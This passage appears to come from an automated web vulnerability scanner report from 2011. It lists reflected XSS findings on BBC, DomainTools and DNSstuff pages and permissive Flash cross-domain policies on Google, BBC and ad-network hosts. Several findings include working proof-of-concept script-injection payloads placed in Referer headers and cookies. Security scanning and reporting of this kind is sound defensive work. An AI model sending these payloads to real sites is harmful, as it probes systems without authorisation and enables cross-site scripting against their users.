       referrer: 'http://www.google.com/search?hl=en&amp;q=d4d7e'-alert(1)-'ec64a95f7e7',
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
       uri: '/sport2/hi/mot
...[SNIP]...

3.196. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f455'-alert(1)-'f2321d0a6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f455'-alert(1)-'f2321d0a6c

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:55 GMT
Keep-Alive: timeout=5, max=794
Expires: Mon, 18 Jul 2011 02:20:55 GMT
Connection: close
Content-Length: 49358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955655000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=4f455'-alert(1)-'f2321d0a6c',
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

3.197. http://www.domaintools.com/learn/help/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5edd4"><script>alert(1)</script>8cde835349e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /learn/help/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5edd4"><script>alert(1)</script>8cde835349e

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:02 GMT
Content-Length: 13206
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools Help</title>
    <link rel="alternate" type="application/rss+xml" ti
...[SNIP]...
<a id="return-to-entry-point" href="http://www.google.com/search?hl=en&q=5edd4"><script>alert(1)</script>8cde835349e">
...[SNIP]...

3.198. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload bef9e<script>alert(1)</script>cd0826810c8 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ST.ashx?scriptonly=true HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:26:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 37861

this.STVisitorValue = "3f03185aa4854245bf4232ef4c0a1a49bef9e<script>alert(1)</script>cd0826810c8";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPortalURL = "";
this.STImgHeigh
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 19 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 01:43:19 GMT
Date: Mon, 18 Jul 2011 01:43:19 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 1955

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.2. http://feed.domaintoolsblog.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.domaintoolsblog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feed.domaintoolsblog.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:16:15 GMT
Date: Mon, 18 Jul 2011 02:16:15 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.3. http://m.webtrends.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:789"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 18 Jul 2011 12:52:05 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.4. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 22:32:55 GMT
Expires: Mon, 18 Jul 2011 22:32:55 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 13375
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.5. http://cbk0.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cbk0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cbk0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Date: Mon, 18 Jul 2011 02:16:07 GMT
Expires: Mon, 18 Jul 2011 02:16:07 GMT
Cache-Control: private, max-age=3600
Last-Modified: Fri, 17 Dec 2004 04:58:08 GMT
X-Content-Type-Options: nosniff
Server: Alleycat Server 1.0
X-XSS-Protection: 1; mode=block

<cross-domain-policy><allow-access-from domain="maps.gstatic.com"/><allow-access-from domain="maps.gstatic.cn"/><allow-access-from domain="*.google.com"/><allow-access-from domain="*.google.at"/><allow-access-from domain="*.google.com.au"/><allow-access-from domain="*.google.be"/><allow-access-from domain="*.google.com.br"/><allow-access-from domain="*.google.ca"/><allow-access-from domain="*.google.cat"/><allow-access-from domain="*.google.ch"/><allow-access-from domain="*.google.cn"/><allow-access-from domain="*.google.cz"/><allow-access-from domain="*.google.de"/><allow-access-from domain="*.google.dk"/><allow-access-from domain="*.google.es"/><allow-access-from domain="*.google.fi"/><allow-access-from domain="*.google.fr"/><allow-access-from domain="*.google.gr"/><allow-access-from domain="*.google.com.hk"/><allow-access-from domain="*.google.hu"/><allow-access-from domain="*.google.ie"/><allow-access-from domain="*.google.co.il"/><allow-access-from domain="*.google.co.in"/><allow-access-from domain="*.google.it"/><allow-access-from domain="*.google.co.jp"/><allow-access-from domain="*.google.co.ke"/><allow-access-from domain="*.google.co.kr"/><allow-access-from domain="*.google.li"/><allow-access-from domain="*.google.nl"/><allow-access-from domain="*.google.no"/><allow-access-from domain="*.google.co.nz"/><allow-access-from domain="*.google.pl"/><allow-access-from domain="*.google.pt"/><allow-access-from domain="*.google.ro"/><allow-access-from domain="*.google.ru"/><allow-access-from domain="*.google.se"/><allow-access-from domain="*.google.com.sg"/><allow-access-from domain="*.google.sk"/><allow-access-from domain="*.google.tk"/><allow-access-from domain="*.google.com.tw"/><allow-access-from domain="*.google.co.uk"/><allow-access-from domain="*.google.co.za"/>
...[SNIP]...

4.6. https://cbks0.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cbks0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cbks0.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Date: Mon, 18 Jul 2011 02:16:08 GMT
Expires: Mon, 18 Jul 2011 02:16:08 GMT
Cache-Control: private, max-age=3600
Last-Modified: Fri, 17 Dec 2004 04:58:08 GMT
X-Content-Type-Options: nosniff
Server: Alleycat Server 1.0
X-XSS-Protection: 1; mode=block

<cross-domain-policy><allow-access-from domain="maps.gstatic.com"/><allow-access-from domain="maps.gstatic.cn"/><allow-access-from domain="*.google.com"/><allow-access-from domain="*.google.at"/><allow-access-from domain="*.google.com.au"/><allow-access-from domain="*.google.be"/><allow-access-from domain="*.google.com.br"/><allow-access-from domain="*.google.ca"/><allow-access-from domain="*.google.cat"/><allow-access-from domain="*.google.ch"/><allow-access-from domain="*.google.cn"/><allow-access-from domain="*.google.cz"/><allow-access-from domain="*.google.de"/><allow-access-from domain="*.google.dk"/><allow-access-from domain="*.google.es"/><allow-access-from domain="*.google.fi"/><allow-access-from domain="*.google.fr"/><allow-access-from domain="*.google.gr"/><allow-access-from domain="*.google.com.hk"/><allow-access-from domain="*.google.hu"/><allow-access-from domain="*.google.ie"/><allow-access-from domain="*.google.co.il"/><allow-access-from domain="*.google.co.in"/><allow-access-from domain="*.google.it"/><allow-access-from domain="*.google.co.jp"/><allow-access-from domain="*.google.co.ke"/><allow-access-from domain="*.google.co.kr"/><allow-access-from domain="*.google.li"/><allow-access-from domain="*.google.nl"/><allow-access-from domain="*.google.no"/><allow-access-from domain="*.google.co.nz"/><allow-access-from domain="*.google.pl"/><allow-access-from domain="*.google.pt"/><allow-access-from domain="*.google.ro"/><allow-access-from domain="*.google.ru"/><allow-access-from domain="*.google.se"/><allow-access-from domain="*.google.com.sg"/><allow-access-from domain="*.google.sk"/><allow-access-from domain="*.google.tk"/><allow-access-from domain="*.google.com.tw"/><allow-access-from domain="*.google.co.uk"/><allow-access-from domain="*.google.co.za"/>
...[SNIP]...

4.7. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 18 Jul 2011 01:52:37 GMT
Date: Mon, 18 Jul 2011 01:50:37 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.8. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 23:05:40 GMT
Expires: Mon, 18 Jul 2011 23:05:40 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 10401
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.9. http://news.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=10
Content-Type: text/xml
Date: Mon, 18 Jul 2011 02:19:14 GMT
Keep-Alive: timeout=5, max=792
Expires: Mon, 18 Jul 2011 02:19:24 GMT
Connection: close
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Length: 1081

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.10. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 18 Jul 2011 01:52:35 GMT
Date: Mon, 18 Jul 2011 01:50:35 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.11. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 17 Jul 2011 22:49:01 GMT
Expires: Mon, 18 Jul 2011 22:49:01 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 12083
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
